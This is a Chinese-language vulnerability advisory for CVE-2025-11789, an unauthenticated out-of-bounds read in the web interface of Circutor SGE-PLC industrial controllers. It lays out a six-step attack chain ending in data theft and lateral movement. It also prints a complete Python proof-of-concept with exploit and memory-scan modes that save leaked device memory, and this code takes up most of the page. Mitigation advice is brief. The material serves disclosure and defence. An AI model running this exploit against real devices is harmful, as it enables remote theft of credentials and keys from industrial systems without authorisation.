CVE-2025-11789 Circutor SGE-PLC越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11789

漏洞类型

越界读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Circutor SGE-PLC1000, Circutor SGE-PLC50

漏洞概述

CVE-2025-11789是Circutor公司SGE-PLC1000和SGE-PLC50工业控制器中存在的一个高危越界读取漏洞，CVSS评分达到7.5分。该漏洞存在于设备的Web管理界面中，具体位于DownloadFile功能模块。由于该功能在处理用户输入参数时，直接使用atoi()函数将外部可控的参数转换为整数，并将其作为索引访问FilesDownload数组，而未进行任何边界检查，当传入的索引值超出数组有效范围时，将导致越界内存读取。攻击者可以利用此漏洞通过网络远程触发，无需任何认证和用户交互即可读取设备内存中的敏感数据，包括可能的配置信息、会话令牌或其他机密内容。此漏洞影响固件版本9.0.2，攻击向量为网络层面，低攻击复杂度使其成为潜在的重大安全威胁。

技术细节

该越界读取漏洞的根源在于DownloadFile函数的不安全实现。函数接收用户通过HTTP请求传递的参数后，使用C语言标准库函数atoi()将其转换为整数类型。这个转换过程存在两个关键问题：首先，atoi()函数不进行错误检查，当输入非数字字符串时会返回0或不可预测的值；其次，转换后的整数直接被用作FilesDownload数组的索引，访问形式为(&FilesDownload)[iVar2]。由于没有任何边界验证逻辑，当iVar2的值超过数组实际大小时，程序将访问数组边界之外的内存区域。这种越界读取可能导致几种后果：读取到未初始化的内存数据、读取到其他变量的值、或在极端情况下触发访问违规导致程序崩溃。攻击者可以通过构造形如/download?file=999999的HTTP GET请求来触发此漏洞，大幅超出数组边界的索引值将导致读取敏感内存数据。由于该设备通常用于工业环境中存储关键配置参数，泄露的数据可能包括认证凭据、通信密钥或工艺流程配置。

攻击链分析

STEP 1

1

情报收集：攻击者识别目标为Circutor SGE-PLC1000或SGE-PLC50设备，通过端口扫描发现Web管理界面（通常开放80/443端口）

STEP 2

2

漏洞识别：确认设备运行固件版本9.0.2或更早版本，访问/download或downloadFile端点确认漏洞存在

STEP 3

3

PoC构造：构造HTTP GET请求，参数file设置为超大整数值（如999999），绕过FilesDownload数组边界检查

STEP 4

4

漏洞利用：通过发送恶意请求触发atoi()函数处理超大索引值，导致越界内存读取

STEP 5

5

数据窃取：接收服务器返回的越界读取数据，可能包含敏感配置信息、会话数据或其他机密内容

STEP 6

6

权限提升/横向移动：利用获取的敏感信息进一步控制设备或渗透内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-11789 PoC - Circutor SGE-PLC Out-of-bounds Read
Target: Circutor SGE-PLC1000/SGE-PLC50 Firmware <= 9.0.2
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-11789
"""

import requests
import sys
import argparse

def exploit(target_url, index_value):
    """
    Exploit the out-of-bounds read vulnerability in DownloadFile function.
    The function uses atoi() to convert parameter to integer and uses it
    as index in FilesDownload array without bounds checking.
    
    Args:
        target_url: Base URL of the Circutor SGE-PLC device
        index_value: Integer index to access out of bounds in FilesDownload array
    """
    # Construct the malicious request
    exploit_url = f"{target_url}/download?file={index_value}"
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploit URL: {exploit_url}")
    print(f"[*] Attempting out-of-bounds read at index: {index_value}")
    
    try:
        # Send HTTP GET request with malicious index value
        # No authentication required (PR:N)
        response = requests.get(exploit_url, timeout=10)
        
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Response Length: {len(response.content)} bytes")
        
        # Check if we got any data (potential information disclosure)
        if response.status_code == 200 and len(response.content) > 0:
            print("[!] Potential information disclosure detected!")
            print(f"[*] Response Content (first 500 bytes):")
            print(response.content[:500])
            
            # Save the response for analysis
            with open(f"oob_read_result_{index_value}.bin", "wb") as f:
                f.write(response.content)
            print(f"[*] Full response saved to oob_read_result_{index_value}.bin")
            
        return response
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None

def scan_memory(target_url, start_index=0, end_index=100):
    """
    Scan memory by trying different index values.
    Compare response lengths to identify valid array bounds.
    """
    print(f"[*] Starting memory scan from index {start_index} to {end_index}")
    
    baseline_length = None
    results = []
    
    for idx in range(start_index, end_index + 1):
        try:
            response = requests.get(
                f"{target_url}/download?file={idx}", 
                timeout=5
            )
            
            content_length = len(response.content)
            
            if baseline_length is None:
                baseline_length = content_length
                print(f"[*] Baseline response length: {content_length}")
            
            # Detect anomalies in response
            if content_length != baseline_length:
                print(f"[!] Index {idx}: Length={content_length} (diff={content_length - baseline_length})")
                results.append({
                    'index': idx,
                    'length': content_length,
                    'diff': content_length - baseline_length
                })
                
        except Exception as e:
            print(f"[-] Index {idx}: Error - {e}")
    
    print(f"\n[*] Scan complete. Found {len(results)} anomalies.")
    return results

if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2025-11789 PoC - Circutor SGE-PLC Out-of-bounds Read"
    )
    parser.add_argument("-t", "--target", required=True, help="Target URL")
    parser.add_argument("-i", "--index", type=int, default=999999, 
                        help="Index value for out-of-bounds read (default: 999999)")
    parser.add_argument("-s", "--scan", action="store_true", 
                        help="Enable memory scan mode")
    parser.add_argument("--start", type=int, default=0, help="Scan start index")
    parser.add_argument("--end", type=int, default=100, help="Scan end index")
    
    args = parser.parse_args()
    
    if args.scan:
        scan_memory(args.target, args.start, args.end)
    else:
        exploit(args.target, args.index)

影响范围

Circutor SGE-PLC1000 固件版本 <= 9.0.2

Circutor SGE-PLC50 固件版本 <= 9.0.2

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：首先，通过网络访问控制限制对SGE-PLC设备Web管理界面的访问，仅允许授权的管理终端访问；其次，在上游防火墙或路由器上实施ACL规则，阻止外部网络对设备80/443端口的直接访问；再次，定期监控设备日志，关注异常的download请求模式；最后，考虑使用VPN或专用网络通道进行设备管理，避免Web接口直接暴露于网络。